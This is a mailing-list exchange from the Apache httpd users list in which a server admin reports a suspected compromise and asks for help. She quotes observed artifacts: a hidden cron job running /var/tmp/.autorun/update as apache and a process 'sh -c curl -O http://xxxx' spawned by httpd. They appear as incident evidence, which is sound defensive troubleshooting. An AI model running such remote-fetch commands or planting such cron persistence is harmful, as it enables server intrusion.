|
From: luisa2010@xxxxxxxxxxx To: users@xxxxxxxxxxxxxxxx Subject: RE: [users@httpd] attack on apache Date: Wed, 11 Jan 2012 16:15:14 -0300 > Date: Mon, 9 Jan 2012 17:30:21 +0000 > From: tevans.uk@xxxxxxxxxxxxxx > To: users@xxxxxxxxxxxxxxxx > Subject: Re: FW: attack on apache > > On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro > <luisa2010@xxxxxxxxxxx> wrote: > > > > > > ________________________________ > > > > I didnīt have any cronjobs but when I detected the attack I saw one in > > /var/spool/cron > > My logifle says > > User apache: > > > > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s) > > > > personal crontab deleted: 56 Time(s) > > > > personal crontab listed: 1 Time(s) > > > > personal crontab replaced: 1 Time(s) > > > > Thanks > > > > Google tells me that this is output from a cpanel perl script - > probably a crontab editor. crontabs are not evidence of an attack. > > You need to show more details of what you think is happening, and why > you think it is malicious. > Cheers Tom I think it is an attack because I found this commands running on my server (with owner apache) /usr/local/apache/bin/httpd - DSFSL sh -c curl -O http://xxxx I also found a folder proc in /var/named/chroot. this folder is the same as /proc, is updated with the original /proc and I can't delete. In /var/log/httpd/error_log I see hink like this sh: del comand no found sh: xx Permission denied I need help ! Thanks Luisa |
|